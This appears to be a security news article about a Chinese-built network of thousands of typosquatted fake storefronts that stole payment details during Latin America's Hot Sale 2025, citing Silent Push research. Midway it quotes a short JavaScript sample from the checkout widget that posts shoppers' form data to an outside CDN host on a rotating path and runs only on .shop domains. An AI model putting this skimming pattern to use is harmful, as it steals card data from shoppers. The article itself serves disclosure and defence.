The deluge of bargain-priced ads that flooded social networks during Latin America’s “Hot Sale 2025” has now been traced to a sprawling Chinese-built malware operation that weaponizes thousands of convincingly branded storefronts to harvest payment credentials.
First noticed by Mexican journalist Ignacio Gómez Villaseñor while monitoring suspicious domains hosted on a single IP, the campaign rapidly expanded beyond Spanish-speaking audiences, cloning Apple’s accessories catalogue in English one day and Wrangler Jeans the next.
Victims are funnelled through glossy checkout pages that accept Visa, MasterCard, PayPal and even Google Pay, masking the theft with authentic logos and a working countdown timer that simulates order processing.
Silent Push analysts identified the infrastructure after discovering an obfuscated “/cn/模板.css” path embedded in every template, a giveaway that the kit’s developer left debugging comments in Mandarin.
Pivoting on that fingerprint exposed more than 9 000 domains registered since March—typos like “harborfrieght.shop” and “tommyilfigershop.com”—all resolving to a rotating pool of Alibaba-hosted servers.
The group keeps overhead low by scraping genuine product imagery directly from the real retailers each time a shopper opens the page, ensuring that takedowns of one brand have no effect on the others.
Within weeks, payment processors were reporting spikes in disputed transactions tied to virtual card numbers, an indication that Google Pay’s tokenisation alone cannot shield users if goods are never shipped.
Charge-back ratios climbed past the threshold at several acquirers, briefly blacklisting innocent merchants whose BINs overlapped with the rogue gateways.
Meanwhile, consumer-grade antivirus tools remained silent because no executable payload is ever dropped; all malicious logic lives in JavaScript delivered from the same CDN that hosts legitimate Shopify plug-ins.
Domain Flux and Widget Obfuscation—The Campaign’s Key Evasion Trick
To stay online, the operators register forty to fifty look-alike domains per day and rotate them behind reverse proxies that rewrite HTTP headers on the fly.
Each store’s checkout widget ships with a tiny script that hides its true origin:-
// stripped sample from Figure_1_checkout_widget.js
if(window.location.hostname.endsWith('.shop')){
const p = '/assets/pay/' + btoa(Date.now()).slice(0,6)+'.php';
fetch('https://api.statimgcdn.com' + p, {method:'POST', body:new FormData(frm)})
.then(res => res.text()).then(showThankYou);
}The conditional ensures the malware only executes on domains ending in “.shop”, preventing analysts who copy HTML to a lab VM. By base-64-encoding a timestamp, the path changes every page load, defeating signature-based web-filters that rely on fixed IOC lists.
Silent Push researchers note that once a domain is reported, DNS records switch to a fresh IP and the widget rewrites itself with a new CDN stub, preserving the merchant façade while nullifying blacklists.
.webp)
The fake website shows the same Wrangler layout reused under “harborfrieght.shop”, illustrating how the kit simply substitutes brand logos and colour palettes during deployment.
Because no malware binary is installed, endpoint detection must instead correlate rapid domain churn with payment-form exfiltration, a task better suited to network-level anomaly engines than to traditional AV.
For now, vigilant URL inspection—look for subtle misspellings and mismatched TLS certificates—remains the most reliable defence until issuers can integrate Silent Push’s feed of Indicators of Future Attack into real-time fraud scoring.
Investigate live malware behavior, trace every step of an attack, and make faster, smarter security decisions -> Try ANY.RUN now
